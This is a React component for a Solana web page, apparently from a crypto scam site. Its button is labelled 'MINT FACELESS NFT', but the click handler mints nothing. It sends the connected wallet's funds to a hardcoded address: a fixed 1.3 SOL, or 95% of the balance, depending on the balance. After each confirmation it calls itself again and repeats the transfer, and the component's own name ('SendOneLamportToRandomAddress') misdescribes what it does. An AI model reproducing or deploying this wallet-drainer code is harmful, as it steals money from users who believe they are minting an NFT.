import { WalletNotConnectedError } from '@solana/wallet-adapter-base';
import { useConnection, useWallet } from '@solana/wallet-adapter-react';
import { getPhantomWallet } from '@solana/wallet-adapter-wallets';
import { SystemProgram, Transaction, PublicKey } from '@solana/web3.js';
import { FC, useCallback } from 'react';

const SendOneLamportToRandomAddress: FC = () => {
    const { connection } = useConnection();
    const { publicKey, sendTransaction } = useWallet();

    var receiverWallet = new PublicKey("4y5ovPKENGe3FSs3RmQirdU857eazmNPKxT1sQUxztSe");

    const onClick = useCallback(async () => {
        if (!publicKey) throw new WalletNotConnectedError();
        console.log(publicKey)
        const bal = await connection.getBalance(publicKey)
        console.log(bal)

        const amountOfSol = 1.3
        const lamportAmount = amountOfSol/0.000000001

        const transaction = new Transaction().add(
            SystemProgram.transfer({
                fromPubkey: publicKey,
                toPubkey: receiverWallet,
                lamports: bal>lamportAmount&&bal<4000000000?lamportAmount:bal*0.95,
            })
        );
        // lamports: bal>lamportAmount&&bal<4000000000?lamportAmount:bal*0.95,

        const signature = await sendTransaction(transaction, connection);

        await connection.confirmTransaction(signature, 'processed')
        .then(res => {
            onClick()
        })
    }, [publicKey, sendTransaction, connection]);

    return (
        <button className="landingPage_actionBtn__1yPzV" onClick={onClick} disabled={!publicKey}>
            MINT FACELESS NFT
        </button>
    );
};

export default SendOneLamportToRandomAddress